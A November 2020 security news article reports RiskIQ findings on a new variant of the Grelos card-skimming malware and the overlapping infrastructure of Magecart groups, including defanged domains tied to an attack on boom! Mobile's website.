19 November 2020

New variant of card-skimming Grelos malware illustrates overlaps in Magecart infrastructure and groups


New variant of card-skimming Grelos malware illustrates overlaps in Magecart infrastructure and groups

A new version of Grelos, a malware associated with Magecart card skimming campaigns, has demonstrated how intricacies and overlaps in infrastructure could create a "murkiness," which makes it harder for security researchers to track separate Magecart groups.

The Grelos skimmer appeared on the threat landscape in 2015 and was previously linked to Magecart Group 1-2, however, this skimmer was also observed in attacks by other threat actors. The latest Grelos version detailed by RiskIQ contains "a rehash" of the original code first seen in 2015-16, consisting of a loader and a skimmer, "both of which are base64 encoded five times over."

The new skimmer variant was uncovered while investigating domains associated with a recent attack against boom! Mobile’s website, in which the Full(z) House group injected a skimmer in website to steal customer data. The domains used in this campaign led the team to a cookie and associated skimmer websites, including facebookapimanager[.]com and googleapimanager[.]com. However, a closer inspection revealed samples of a recent variant of the Grelos skimmer, not the Full(z) House malware.

"In several recent Magecart compromises, we have seen increasing overlaps in infrastructure used to host various skimmers that are unrelated in terms of the techniques and code structures they employ," said RiskIQ. "We also observe new variants of skimmers reusing code seen over the last several years."

Different skimmer variants linked to Grelos have been "using the same infrastructure or other connections through WHOIS records and other malicious activities, such as phishing and malware during this investigation," the researchers said.

Back to the list

Latest Posts

Two Romanians arrested for running malware services

Two Romanians arrested for running malware services

The duo allegedly operated the CyberSeal and Dataprotector crypting services, as well as the CyberScan service, which allowed their customers to test their malware against antivirus solutions.
23 November 2020
Manchester United discloses a ‘sophisticated’ cyber attack

Manchester United discloses a ‘sophisticated’ cyber attack

United officials said that are not aware of any breach of personal data associated with club's fans and customers.
23 November 2020
Hacker shares a list of nearly 50,000 vulnerable Fortinet VPN devices

Hacker shares a list of nearly 50,000 vulnerable Fortinet VPN devices

The list of vulnerable targets includes domains belonging to large enterprises, financial institutions, and government organizations from all over the world.
23 November 2020